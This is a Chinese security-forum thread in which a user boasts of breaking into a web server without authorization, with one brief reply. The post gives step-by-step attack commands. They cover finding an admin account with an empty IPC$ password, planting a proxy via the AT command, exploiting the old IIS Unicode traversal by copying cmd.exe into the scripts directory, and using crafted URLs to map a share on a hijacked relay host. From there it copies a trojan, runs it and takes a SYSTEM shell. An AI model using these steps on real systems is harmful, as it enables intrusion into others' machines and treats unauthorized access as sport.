|
![]() | 作者: paike [paike]
![]() |
登录 |
大家好!初来夹道,没什么好说的,献了小弟前几天一入侵报告。希望大家不要嫌弃。 11。23日晚23:33打开电脑,小猫拨号上网,浏览网页,发现一个站的网页(127.0.1.1)其中一版不能浏览,不过其中内容很感兴趣。后发现次主机不是关的。只是屏蔽了外来IP。 打开X-SCAN扫描IPC$弱口令,终于搞到了(127.0.1.8) N:admin P:<NULL> 赶快上传SNAKE的代理程序,重命名为char.exe,用AT命令开使其5266做为我的SOCK5的代理端口,再下载了SNAKE的代理GUI版本,哈哈,终于可以浏览到那主页了,高兴啊!!! 无聊中……………… 打开流光帮我的肉鸡127.0.1.8安装了扫描程序,扫描………… 发现有大名鼎鼎的UNICODE漏洞 主机是NT4.0的,老的一~~~~~~~~~ 用流光将CMD。EXE复制到SCRIPTS目录中改为ccc.exe 再用代理打开浏览器,http://127.0.1.1/scripts/ccc.exe?/c+dir+c:\ 有文件目录了,可以了 打开TFTP想上传木马,发现不行 想~~~~~~~~~ 打开代理的浏览器http://127.0.1.1/scripts/ccc.exe?/c+echo+net+user+\\127.0.0.8\ipc$+""+/user:"admin"+>gg.bat http://127.0.1.1/scripts/ccc.exe?/c+echo+z:+\\127.0.0.8\c$+>>gg.bat(共巷肉鸡) http://127.0.1.1/scripts/ccc.exe?/c+gg 哈哈,回到流光用copy z:\server.exe c:\inerpub\scripts\111.exe http://127.0.1.1/scripts/ccc.exe?/c+111 其中server.exe是我事先放到我的肉鸡的木马 OK,打开我的CMD telnet 127.0.1.1 5277 哈哈,真爽,竟然是system登陆的! 写完了,发现竟然在UNIX区,不管了,希望斑竹不介意! [此贴被 paike(paike) 在 12月1日1时0分 编辑过] |
地主 发表时间: 12/1 1:15 |
![]() | 回复: quest [quest] ![]() |
登录 |
有admin 了,你把文章down下来看不是更爽了吗? |
B1层 发表时间: 12/05 09:02 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号